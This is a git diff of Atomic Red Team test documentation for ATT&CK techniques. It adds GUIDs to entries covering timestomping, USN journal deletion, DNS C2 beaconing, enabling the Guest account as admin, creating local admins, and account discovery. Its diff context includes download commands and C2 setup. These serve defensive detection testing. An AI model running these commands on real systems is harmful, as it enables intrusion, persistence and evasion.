## Atomic Test #5 - Windows - Modify file creation timestamp with PowerShell + +auto_generated_guid: b3b2c408-2ff0-4a33-b89b-1cb46a9e6a9c + Modifies the file creation timestamp of a specified file. This technique was seen in use by the Stitch RAT. To verify execution, use File Explorer to view the Properties of the file and observe that the Created time is the year 1970. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | target_date_time | Date/time to replace original timestamps with | String | 01/01/1970 00:00:00| | file_path | Path of file to change creation timestamp | Path | $env:TEMP\T1551.006_timestomp.txt| @@ -185,7 +195,7 @@ Remove-Item #{file_path} -Force -ErrorAction Ignore ##### Description: A file must exist at the path (#{file_path}) to change the creation time on ##### Check Prereq Commands: ```powershell -if (Test-Path #{file_path}) {exit 0} else {exit 1} +if (Test-Path #{file_path}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -200,16 +210,18 @@ Set-Content #{file_path} -Value "T1551.006 Timestomp" -Force | Out-Null
## Atomic Test #6 - Windows - Modify file last modified timestamp with PowerShell + +auto_generated_guid: f8f6634d-93e1-4238-8510-f8a90a20dcf2 + Modifies the file last modified timestamp of a specified file. This technique was seen in use by the Stitch RAT. To verify execution, use File Explorer to view the Properties of the file and observe that the Modified time is the year 1970. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | target_date_time | Date/time to replace original timestamps with | String | 01/01/1970 00:00:00| | file_path | Path of file to change modified timestamp | Path | $env:TEMP\T1551.006_timestomp.txt| @@ -233,7 +245,7 @@ Remove-Item #{file_path} -Force -ErrorAction Ignore ##### Description: A file must exist at the path (#{file_path}) to change the modified time on ##### Check Prereq Commands: ```powershell -if (Test-Path #{file_path}) {exit 0} else {exit 1} +if (Test-Path #{file_path}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -248,16 +260,18 @@ Set-Content #{file_path} -Value "T1551.006 Timestomp" -Force | Out-Null
## Atomic Test #7 - Windows - Modify file last access timestamp with PowerShell + +auto_generated_guid: da627f63-b9bd-4431-b6f8-c5b44d061a62 + Modifies the last access timestamp of a specified file. This technique was seen in use by the Stitch RAT. To verify execution, use File Explorer to view the Properties of the file and observe that the Accessed time is the year 1970. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | target_date_time | Date/time to replace original timestamps with | String | 01/01/1970 00:00:00| | file_path | Path of file to change last access timestamp | Path | $env:TEMP\T1551.006_timestomp.txt| @@ -281,7 +295,7 @@ Remove-Item #{file_path} -Force -ErrorAction Ignore ##### Description: A file must exist at the path (#{file_path}) to change the last access time on ##### Check Prereq Commands: ```powershell -if (Test-Path #{file_path}) {exit 0} else {exit 1} +if (Test-Path #{file_path}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -296,19 +310,21 @@ Set-Content #{file_path} -Value "T1551.006 Timestomp" -Force | Out-Null
## Atomic Test #8 - Windows - Timestomp a File + +auto_generated_guid: d7512c33-3a75-4806-9893-69abc3ccdd43 + Timestomp kxwn.lock. Successful execution will include the placement of kxwn.lock in #{file_path} and execution of timestomp.ps1 to modify the time of the .lock file. [Mitre ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/master/adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/defensive-evasion/4a2ad84e-a93a-4b2e-b1f0-c354d6a41278.yml) - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_path | File path for timestomp payload | String | $env:appdata\Microsoft| @@ -333,7 +349,7 @@ Remove-Item #{file_path}\kxwn.lock -ErrorAction Ignore ##### Description: timestomp.ps1 must be present in #{file_path}. ##### Check Prereq Commands: ```powershell -if (Test-Path #{file_path}\timestomp.ps1) {exit 0} else {exit 1} +if (Test-Path #{file_path}\timestomp.ps1) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -342,7 +358,7 @@ Invoke-WebRequest "https://raw.githubusercontent.com/mitre-attack/attack-arsenal ##### Description: kxwn.lock must be present in #{file_path}. ##### Check Prereq Commands: ```powershell -if (Test-Path -path "#{file_path}\kxwn.lock") {exit 0} else {exit 1} +if (Test-Path -path "#{file_path}\kxwn.lock") {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1070/T1070.md b/atomics/T1070/T1070.md index 92588a46..159510d9 100644 --- a/atomics/T1070/T1070.md +++ b/atomics/T1070/T1070.md @@ -12,9 +12,11 @@ These actions may interfere with event collection, reporting, or other notificat
## Atomic Test #1 - Indicator Removal using FSUtil + +auto_generated_guid: b4115c7a-0e92-47f0-a61e-17e7218b2435 + Manages the update sequence number (USN) change journal, which provides a persistent log of all changes made to files on the volume. Upon execution, no output will be displayed. More information about fsutil can be found at https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn - **Supported Platforms:** Windows diff --git a/atomics/T1071.001/T1071.001.md b/atomics/T1071.001/T1071.001.md index f1ba954c..58a4fe43 100644 --- a/atomics/T1071.001/T1071.001.md +++ b/atomics/T1071.001/T1071.001.md @@ -16,18 +16,20 @@ Protocols such as HTTP and HTTPS that carry web traffic may be very common in en
## Atomic Test #1 - Malicious User Agents - Powershell + +auto_generated_guid: 81c13829-f6c9-45b8-85a6-053366d55297 + This test simulates an infected host beaconing to command and control. Upon execution, no output will be displayed. Use an application such as Wireshark to record the session and observe user agent strings and responses. Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | domain | Default domain to simulate against | string | www.google.com| @@ -51,18 +53,20 @@ Invoke-WebRequest #{domain} -UserAgent "*<|>*" | out-null
## Atomic Test #2 - Malicious User Agents - CMD + +auto_generated_guid: dc3488b0-08c7-4fea-b585-905c83b48180 + This test simulates an infected host beaconing to command and control. Upon execution, no out put will be displayed. Use an application such as Wireshark to record the session and observe user agent strings and responses. Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | domain | Default domain to simulate against | string | www.google.com| | curl_path | path to curl.exe | path | C:\Windows\System32\Curl.exe| @@ -85,7 +89,7 @@ Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/m ##### Description: Curl must be installed on system ##### Check Prereq Commands: ```powershell -if (Test-Path #{curl_path}) {exit 0} else {exit 1} +if (Test-Path #{curl_path}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -103,16 +107,18 @@ Remove-Item $env:temp\curl.zip
## Atomic Test #3 - Malicious User Agents - Nix + +auto_generated_guid: 2d7c471a-e887-4b78-b0dc-b0df1f2e0658 + This test simulates an infected host beaconing to command and control. Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat - **Supported Platforms:** Linux, macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | domain | Default domain to simulate against | string | www.google.com| diff --git a/atomics/T1071.004/T1071.004.md b/atomics/T1071.004/T1071.004.md index 22de47a9..17f935e4 100644 --- a/atomics/T1071.004/T1071.004.md +++ b/atomics/T1071.004/T1071.004.md @@ -18,17 +18,19 @@ The DNS protocol serves an administrative function in computer networking and th
## Atomic Test #1 - DNS Large Query Volume + +auto_generated_guid: 1700f5d6-5a44-487b-84de-bc66f507b0a6 + This test simulates an infected host sending a large volume of DNS queries to a command and control server. The intent of this test is to trigger threshold based detection on the number of DNS queries either from a single source system or to a single targe domain. A custom domain and sub-domain will need to be passed as input parameters for this test to work. Upon execution, DNS information about the domain will be displayed for each callout. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | query_type | DNS query type | string | TXT| | subdomain | Subdomain prepended to the domain name | string | atomicredteam| @@ -52,17 +54,19 @@ for($i=0; $i -le #{query_volume}; $i++) { Resolve-DnsName -type "#{query_type}"
## Atomic Test #2 - DNS Regular Beaconing + +auto_generated_guid: 3efc144e-1af8-46bb-8ca2-1376bb6db8b6 + This test simulates an infected host beaconing via DNS queries to a command and control server at regular intervals over time. This behaviour is typical of implants either in an idle state waiting for instructions or configured to use a low query volume over time to evade threshold based detection. A custom domain and sub-domain will need to be passed as input parameters for this test to work. Upon execution, DNS information about the domain will be displayed for each callout. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | runtime | Time in minutes to run the simulation | integer | 30| | domain | Default domain to simulate against | string | 127.0.0.1.xip.io| @@ -89,17 +93,19 @@ Set-Location PathToAtomicsFolder
## Atomic Test #3 - DNS Long Domain Query + +auto_generated_guid: fef31710-223a-40ee-8462-a396d6b66978 + This test simulates an infected host returning data to a command and control server using long domain names. The simulation involves sending DNS queries that gradually increase in length until reaching the maximum length. The intent is to test the effectiveness of detection of DNS queries for long domain names over a set threshold. Upon execution, DNS information about the domain will be displayed for each callout. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | query_type | DNS query type | string | TXT| | subdomain | Subdomain prepended to the domain name (should be 63 characters to test maximum length) | string | atomicredteamatomicredteamatomicredteamatomicredteamatomicredte| @@ -123,20 +129,22 @@ Set-Location PathToAtomicsFolder
## Atomic Test #4 - DNS C2 + +auto_generated_guid: e7bf9802-2e78-4db9-93b5-181b7bcd37d7 + This will attempt to start a C2 session using the DNS protocol. You will need to have a listener set up and create DNS records prior to executing this command. The following blogs have more information. https://github.com/iagox86/dnscat2 https://github.com/lukebaggett/dnscat2-powershell - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | domain | Domain Name configured to use DNS Server where your C2 listener is running | string | example.com| | server_ip | IP address of DNS server where your C2 listener is running | string | 127.0.0.1| diff --git a/atomics/T1072/T1072.md b/atomics/T1072/T1072.md index 346ab27a..7148ce67 100644 --- a/atomics/T1072/T1072.md +++ b/atomics/T1072/T1072.md @@ -14,15 +14,17 @@ The permissions required for this action vary by system configuration; local cre
## Atomic Test #1 - Radmin Viewer Utility -An adversary may use Radmin Viewer Utility to remotely control Windows device, this will start the radmin console. +auto_generated_guid: b4988cad-6ed2-434d-ace5-ea2670782129 + +An adversary may use Radmin Viewer Utility to remotely control Windows device, this will start the radmin console. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | radmin_installer | Radmin Viewer installer | Path | %TEMP%\RadminViewer.msi| | radmin_exe | The radmin.exe executable from RadminViewer.msi | Path | %PROGRAMFILES(x86)%/Radmin Viewer 3/Radmin.exe| @@ -42,7 +44,7 @@ An adversary may use Radmin Viewer Utility to remotely control Windows device, t ##### Description: Radmin Viewer Utility must be installed at specified location (#{radmin_exe}) ##### Check Prereq Commands: ```cmd -if not exist "#{radmin_exe}" (exit /b 1) +if not exist "#{radmin_exe}" (exit /b 1) ``` ##### Get Prereq Commands: ```cmd diff --git a/atomics/T1074.001/T1074.001.md b/atomics/T1074.001/T1074.001.md index 87f04803..99d5bd9a 100644 --- a/atomics/T1074.001/T1074.001.md +++ b/atomics/T1074.001/T1074.001.md @@ -14,16 +14,18 @@
## Atomic Test #1 - Stage data from Discovery.bat + +auto_generated_guid: 107706a5-6f9f-451a-adae-bab8c667829f + Utilize powershell to download discovery.bat and save to a local file. This emulates an attacker downloading data collection tools onto the host. Upon execution, verify that the file is saved in the temp directory. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Location to save downloaded discovery.bat file | Path | $env:TEMP\discovery.bat| @@ -48,15 +50,17 @@ Remove-Item -Force #{output_file} -ErrorAction Ignore
## Atomic Test #2 - Stage data from Discovery.sh -Utilize curl to download discovery.sh and execute a basic information gathering shell script +auto_generated_guid: 39ce0303-ae16-4b9e-bb5b-4f53e8262066 + +Utilize curl to download discovery.sh and execute a basic information gathering shell script **Supported Platforms:** Linux, macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Location to save downloaded discovery.bat file | Path | /tmp/T1074.001_discovery.log| @@ -77,16 +81,18 @@ curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ato
## Atomic Test #3 - Zip a Folder with PowerShell for Staging in Temp + +auto_generated_guid: a57fbe4b-3440-452a-88a7-943531ac872a + Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration. Upon execution, Verify that a zipped folder named Folder_to_zip.zip was placed in the temp directory. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Location to save zipped file or folder | Path | $env:TEMP\Folder_to_zip.zip| | input_file | Location of file or folder to zip | Path | PathToAtomicsFolder\T1074.001\bin\Folder_to_zip| diff --git a/atomics/T1078.001/T1078.001.md b/atomics/T1078.001/T1078.001.md index 4ed80952..3f1b6291 100644 --- a/atomics/T1078.001/T1078.001.md +++ b/atomics/T1078.001/T1078.001.md @@ -12,16 +12,18 @@ Default accounts are not limited to client machines, rather also include account
## Atomic Test #1 - Enable Guest account with RDP capability and admin priviliges + +auto_generated_guid: 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 + After execution the Default Guest account will be enabled (Active) and added to Administrators and Remote Desktop Users Group, and desktop will allow multiple RDP connections. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | guest_user | Specify the guest account | String | guest| | guest_password | Specify the guest password | String | Password123!| diff --git a/atomics/T1078.003/T1078.003.md b/atomics/T1078.003/T1078.003.md index 36d3713c..88b2cf6e 100644 --- a/atomics/T1078.003/T1078.003.md +++ b/atomics/T1078.003/T1078.003.md @@ -12,8 +12,10 @@ Local Accounts may also be abused to elevate privileges and harvest credentials
## Atomic Test #1 - Create local account with admin priviliges -After execution the new account will be active and added to the Administrators group +auto_generated_guid: a524ce99-86de-4db6-b4f9-e08f35a47a15 + +After execution the new account will be active and added to the Administrators group **Supported Platforms:** Windows diff --git a/atomics/T1082/T1082.md b/atomics/T1082/T1082.md index 7c4d1d40..579b4cce 100644 --- a/atomics/T1082/T1082.md +++ b/atomics/T1082/T1082.md @@ -34,8 +34,10 @@ Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure a
## Atomic Test #1 - System Information Discovery -Identify System Info. Upon execution, system info and time info will be displayed. +auto_generated_guid: 66703791-c902-4560-8770-42b8a91f7667 + +Identify System Info. Upon execution, system info and time info will be displayed. **Supported Platforms:** Windows @@ -59,8 +61,10 @@ reg query HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum
## Atomic Test #2 - System Information Discovery -Identify System Info +auto_generated_guid: edff98ec-0f73-4f63-9890-6b117092aff6 + +Identify System Info **Supported Platforms:** macOS @@ -84,15 +88,17 @@ ls -al /Applications
## Atomic Test #3 - List OS Information -Identify System Info +auto_generated_guid: cccb070c-df86-4216-a5bc-9fb60c74e27c + +Identify System Info **Supported Platforms:** Linux, macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Output file used to store the results. | path | /tmp/T1082.txt| @@ -122,8 +128,10 @@ rm #{output_file} 2>/dev/null
## Atomic Test #4 - Linux VM Check via Hardware -Identify virtual machine hardware. This technique is used by the Pupy RAT and other malware. +auto_generated_guid: 31dad7ad-2286-4c02-ae92-274418c85fec + +Identify virtual machine hardware. This technique is used by the Pupy RAT and other malware. **Supported Platforms:** Linux @@ -153,8 +161,10 @@ if [ -x "$(command -v lscpu)" ]; then sudo lscpu | grep -i "Xen\|KVM\|Microsoft"
## Atomic Test #5 - Linux VM Check via Kernel Modules -Identify virtual machine guest kernel modules. This technique is used by the Pupy RAT and other malware. +auto_generated_guid: 8057d484-0fae-49a4-8302-4812c4f1e64e + +Identify virtual machine guest kernel modules. This technique is used by the Pupy RAT and other malware. **Supported Platforms:** Linux @@ -181,8 +191,10 @@ sudo lsmod | grep -i "hv_vmbus\|hv_blkvsc\|hv_netvsc\|hv_utils\|hv_storvsc"
## Atomic Test #6 - Hostname Discovery (Windows) -Identify system hostname for Windows. Upon execution, the hostname of the device will be displayed. +auto_generated_guid: 85cfbf23-4a1e-4342-8792-007e004b975f + +Identify system hostname for Windows. Upon execution, the hostname of the device will be displayed. **Supported Platforms:** Windows @@ -205,8 +217,10 @@ hostname
## Atomic Test #7 - Hostname Discovery -Identify system hostname for Linux and macOS systems. +auto_generated_guid: 486e88ea-4f56-470f-9b57-3f4d73f39133 + +Identify system hostname for Linux and macOS systems. **Supported Platforms:** Linux, macOS @@ -229,8 +243,10 @@ hostname
## Atomic Test #8 - Windows MachineGUID Discovery -Identify the Windows MachineGUID value for a system. Upon execution, the machine GUID will be displayed from registry. +auto_generated_guid: 224b4daf-db44-404e-b6b2-f4d1f0126ef8 + +Identify the Windows MachineGUID value for a system. Upon execution, the machine GUID will be displayed from registry. **Supported Platforms:** Windows @@ -253,18 +269,20 @@ REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuid
## Atomic Test #9 - Griffon Recon + +auto_generated_guid: 69bd4abe-8759-49a6-8d21-0f15822d6370 + Griffon is a sophisticated tool believed to be in use by one of more "APT" groups. This atomic is for detecting, specifically, the reconnaissance part of the tool. This script used here was reduced by security researcher Kirk Sayre (github.com/kirk-sayre-work/1a9476e7708ed650508f9fb5adfbad9d), and it gives the exact same recon behavior as the original (minus the C2 interaction). For more information see also e.g. https://malpedia.caad.fkie.fraunhofer.de/details/js.griffon and https://attack.mitre.org/software/S0417/ - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | vbscript | Path to sample script | String | PathToAtomicsFolder\T1082\src\griffon_recon.vbs| @@ -285,8 +303,10 @@ cscript #{vbscript}
## Atomic Test #10 - Environment variables discovery on windows -Identify all environment variables. Upon execution, environments variables and your path info will be displayed. +auto_generated_guid: f400d1c0-1804-4ff8-b069-ef5ddd2adbf3 + +Identify all environment variables. Upon execution, environments variables and your path info will be displayed. **Supported Platforms:** Windows @@ -309,8 +329,10 @@ set
## Atomic Test #11 - Environment variables discovery on macos and linux -Identify all environment variables. Upon execution, environments variables and your path info will be displayed. +auto_generated_guid: fcbdd43f-f4ad-42d5-98f3-0218097e2720 + +Identify all environment variables. Upon execution, environments variables and your path info will be displayed. **Supported Platforms:** macOS, Linux diff --git a/atomics/T1083/T1083.md b/atomics/T1083/T1083.md index a50dbcfe..7bd81b17 100644 --- a/atomics/T1083/T1083.md +++ b/atomics/T1083/T1083.md @@ -18,9 +18,11 @@ Many command shell utilities can be used to obtain this information. Examples in
## Atomic Test #1 - File and Directory Discovery (cmd.exe) + +auto_generated_guid: 0e36303b-6762-4500-b003-127743b80ba6 + Find or discover files on the file system. Upon execution, the file "download" will be placed in the temporary folder and contain the output of all of the data discovery commands. - **Supported Platforms:** Windows @@ -49,8 +51,10 @@ tree /F >> %temp%\download
## Atomic Test #2 - File and Directory Discovery (PowerShell) -Find or discover files on the file system. Upon execution, file and folder information will be displayed. +auto_generated_guid: 2158908e-b7ef-4c21-8a83-3ce4dd05a924 + +Find or discover files on the file system. Upon execution, file and folder information will be displayed. **Supported Platforms:** Windows @@ -75,6 +79,9 @@ gci -recurse
## Atomic Test #3 - Nix File and Diectory Discovery + +auto_generated_guid: ffc8b249-372a-4b74-adcd-e4c0430842de + Find or discover files on the file system References: @@ -82,14 +89,13 @@ References: http://osxdaily.com/2013/01/29/list-all-files-subdirectory-contents-recursively/ https://perishablepress.com/list-files-folders-recursively-terminal/ - **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Output file used to store the results. | path | /tmp/T1083.txt| @@ -121,15 +127,17 @@ rm #{output_file}
## Atomic Test #4 - Nix File and Directory Discovery 2 -Find or discover files on the file system +auto_generated_guid: 13c5e1ae-605b-46c4-a79f-db28c77ff24e + +Find or discover files on the file system **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Output file used to store the results. | path | /tmp/T1083.txt| diff --git a/atomics/T1087.001/T1087.001.md b/atomics/T1087.001/T1087.001.md index de48610e..98eebaf4 100644 --- a/atomics/T1087.001/T1087.001.md +++ b/atomics/T1087.001/T1087.001.md @@ -32,15 +32,17 @@ Commands such as net user and net localgroup of the [N
## Atomic Test #1 - Enumerate all accounts (Local) -Enumerate all accounts by copying /etc/passwd to another file +auto_generated_guid: f8aab3dd-5990-4bf8-b8ab-2226c951696f + +Enumerate all accounts by copying /etc/passwd to another file **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Path where captured results will be placed | Path | /tmp/T1087.001.txt| @@ -66,15 +68,17 @@ rm -f #{output_file}
## Atomic Test #2 - View sudoers access -(requires root) +auto_generated_guid: fed9be70-0186-4bde-9f8a-20945f9370c2 + +(requires root) **Supported Platforms:** Linux, macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Path where captured results will be placed | Path | /tmp/T1087.001.txt| @@ -100,15 +104,17 @@ rm -f #{output_file}
## Atomic Test #3 - View accounts with UID 0 -View accounts with UID 0 +auto_generated_guid: c955a599-3653-4fe5-b631-f11c00eb0397 + +View accounts with UID 0 **Supported Platforms:** Linux, macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Path where captured results will be placed | Path | /tmp/T1087.001.txt| @@ -134,8 +140,10 @@ rm -f #{output_file} 2>/dev/null
## Atomic Test #4 - List opened files by user -List opened files by user +auto_generated_guid: 7e46c7a5-0142-45be-a858-1a3ecb4fd3cb + +List opened files by user **Supported Platforms:** Linux, macOS @@ -158,15 +166,17 @@ username=$(id -u -n) && lsof -u $username
## Atomic Test #5 - Show if a user account has ever logged in remotely -Show if a user account has ever logged in remotely +auto_generated_guid: 0f0b6a29-08c3-44ad-a30b-47fd996b2110 + +Show if a user account has ever logged in remotely **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Path where captured results will be placed | Path | /tmp/T1087.001.txt| @@ -190,7 +200,7 @@ rm -f #{output_file} ##### Description: Check if lastlog command exists on the machine ##### Check Prereq Commands: ```sh -if [ -x "$(command -v lastlog)" ]; then exit 0; else exit 1; +if [ -x "$(command -v lastlog)" ]; then exit 0; else exit 1; ``` ##### Get Prereq Commands: ```sh @@ -204,8 +214,10 @@ echo "Install lastlog on the machine to run the test."; exit 1;
## Atomic Test #6 - Enumerate users and groups -Utilize groups and id to enumerate users and groups +auto_generated_guid: e6f36545-dc1e-47f0-9f48-7f730f54a02e + +Utilize groups and id to enumerate users and groups **Supported Platforms:** Linux, macOS @@ -229,8 +241,10 @@ id
## Atomic Test #7 - Enumerate users and groups -Utilize local utilities to enumerate users and groups +auto_generated_guid: 319e9f6c-7a9e-432e-8c62-9385c803b6f2 + +Utilize local utilities to enumerate users and groups **Supported Platforms:** macOS @@ -257,9 +271,11 @@ dscacheutil -q user
## Atomic Test #8 - Enumerate all accounts on Windows (Local) + +auto_generated_guid: 80887bec-5a9b-4efc-a81d-f83eb2eb32ab + Enumerate all accounts Upon exection, multiple enumeration commands will be run and their output displayed in the PowerShell session - **Supported Platforms:** Windows @@ -286,8 +302,10 @@ net localgroup
## Atomic Test #9 - Enumerate all accounts via PowerShell (Local) -Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed. +auto_generated_guid: ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b + +Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed. **Supported Platforms:** Windows @@ -318,8 +336,10 @@ net localgroup
## Atomic Test #10 - Enumerate logged on users via CMD (Local) -Enumerate logged on users. Upon exeuction, logged on users will be displayed. +auto_generated_guid: a138085e-bfe5-46ba-a242-74a6fb884af3 + +Enumerate logged on users. Upon exeuction, logged on users will be displayed. **Supported Platforms:** Windows @@ -342,8 +362,10 @@ query user
## Atomic Test #11 - Enumerate logged on users via PowerShell -Enumerate logged on users via PowerShell. Upon exeuction, logged on users will be displayed. +auto_generated_guid: 2bdc42c7-8907-40c2-9c2b-42919a00fe03 + +Enumerate logged on users via PowerShell. Upon exeuction, logged on users will be displayed. **Supported Platforms:** Windows diff --git a/atomics/T1087.002/T1087.002.md b/atomics/T1087.002/T1087.002.md index f39060c1..8949d5be 100644 --- a/atomics/T1087.002/T1087.002.md +++ b/atomics/T1087.002/T1087.002.md @@ -30,9 +30,11 @@ Commands such as net user /domain and net group /domain ## Atomic Test #1 - Enumerate all accounts (Domain) + +auto_generated_guid: 6fbc9e68-5ad7-444a-bd11-8bf3136c477e + Enumerate all accounts Upon exection, multiple enumeration commands will be run and their output displayed in the PowerShell session - **Supported Platforms:** Windows @@ -56,8 +58,10 @@ net group /domain
## Atomic Test #2 - Enumerate all accounts via PowerShell (Domain) -Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed. +auto_generated_guid: 8b8a6449-be98-4f42-afd2-dedddc7453b2 + +Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed. **Supported Platforms:** Windows @@ -82,15 +86,17 @@ get-aduser -filter *
## Atomic Test #3 - Enumerate logged on users via CMD (Domain) -Enumerate logged on users. Upon exeuction, logged on users will be displayed. +auto_generated_guid: 161dcd85-d014-4f5e-900c-d3eaae82a0f7 + +Enumerate logged on users. Upon exeuction, logged on users will be displayed. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | computer_name | Name of remote system to query | String | $env:COMPUTERNAME| @@ -111,16 +117,18 @@ query user /SERVER:#{computer_name}
## Atomic Test #4 - Automated AD Recon (ADRecon) + +auto_generated_guid: 95018438-454a-468c-a0fa-59c800149b59 + ADRecon extracts and combines information about an AD environement into a report. Upon execution, an Excel file with all of the data will be generated and its path will be displayed. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | adrecon_path | Path of ADRecon.ps1 file | Path | $env:TEMP\ADRecon.ps1| @@ -144,7 +152,7 @@ Get-ChildItem $env:TEMP -Recurse -Force | Where{$_.Name -Match "^ADRecon-Report- ##### Description: ADRecon must exist on disk at specified location (#{adrecon_path}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{adrecon_path}) {exit 0} else {exit 1} +if (Test-Path #{adrecon_path}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -158,16 +166,18 @@ Invoke-WebRequest -Uri "https://raw.githubusercontent.com/sense-of-security/ADRe
## Atomic Test #5 - Adfind -Listing password policy + +auto_generated_guid: 736b4f53-f400-4c22-855d-1a6b5a551600 + Adfind tool can be used for reconnaissance in an Active directory environment. The example chosen illustrates adfind used to query the local password policy. reference- http://www.joeware.net/freetools/tools/adfind/, https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | adfind_path | Path to the AdFind executable | Path | PathToAtomicsFolder\T1087.002\src\AdFind.exe| @@ -186,7 +196,7 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://social.techne ##### Description: AdFind.exe must exist on disk at specified location (#{adfind_path}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{adfind_path}) {exit 0} else {exit 1} +if (Test-Path #{adfind_path}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -200,16 +210,18 @@ Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/maste
## Atomic Test #6 - Adfind - Enumerate Active Directory Admins + +auto_generated_guid: b95fd967-4e62-4109-b48d-265edfd28c3a + Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Admin accounts reference- http://www.joeware.net/freetools/tools/adfind/, https://stealthbits.com/blog/fun-with-active-directorys-admincount-attribute/ - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | adfind_path | Path to the AdFind executable | Path | PathToAtomicsFolder\T1087.002\src\AdFind.exe| @@ -228,7 +240,7 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://stealthbits.c ##### Description: AdFind.exe must exist on disk at specified location (#{adfind_path}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{adfind_path}) {exit 0} else {exit 1} +if (Test-Path #{adfind_path}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -242,16 +254,18 @@ Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/maste
